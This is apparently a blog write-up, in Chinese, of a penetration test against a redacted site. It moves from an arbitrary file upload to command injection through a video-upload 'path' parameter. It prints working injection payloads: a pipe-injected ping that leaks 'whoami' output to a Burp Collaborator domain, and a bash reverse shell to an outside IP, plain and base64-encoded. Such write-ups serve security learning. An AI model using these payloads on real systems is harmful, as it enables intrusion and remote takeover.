主站打开是这样的只有扫码登陆
尝试扫码提示未注册
查看js,网站用了webpack打包
所有请求都在
这个js里面
尝试寻找敏感接口无果
百度site:domain.com
注意到wx1子域,打开这个链接跳转到在微信打开
那就到微信打开,查看功能点发现一处上传,先上传正常图片
改最下面的filename,后缀不变
改上面的filename参数,发现应该是任意文件上传
因为在js中发现php的ueditor(访问文件不存在)
顾认为是php的站,于是上传php,成功上传
访问此php文件直接被下载回来,没有解析(文件在主站下)
此时想到的是这个目录不解析php文件,上传包中有一个path参数,想着将文件上传跨目录到网站根目录
先尝试随便命名一个文件夹,可以创建,访问文件也存在
尝试../ ..跨目录失败
后面尝试各种姿势还是没能跨目录,也尝试修改上传URI
把Image改为File,显示404
改为upload还是在原来那个目录
于是回头看,微信里的功能
找到一处视频上传,把图片改为mp4后缀上传抓包,发包直接报错
此时注意到报错返回的结果,是在执行视频解析的系统命令,注意到下面截图中的两个点
因为path可控那我是不是可以直接拼接命令呢,于是尝试拼接
| ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net |
dnslog收到响应whoami执行结果为root,此时确定存在命令执行
直接反弹shell,服务器没收到
| bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 |
感觉是有特殊字符的原因,于是采用base64编码
tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash
监听的端口依然没收到响应
于是采用#注释后面的命令
tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash #
成功反弹shell,发现原来是node.js的站,难怪之前不解析
wx站
主站
此目录记录当时所做之尝试
其实一开始就应该注意到
Express是node.js的一个开发框架就不会在文件上传不解析那里搞那么久了
最后
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的
本文始发于微信公众号(无害实验室sec):从文件上传到命令注入的一次曲折的渗透过程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论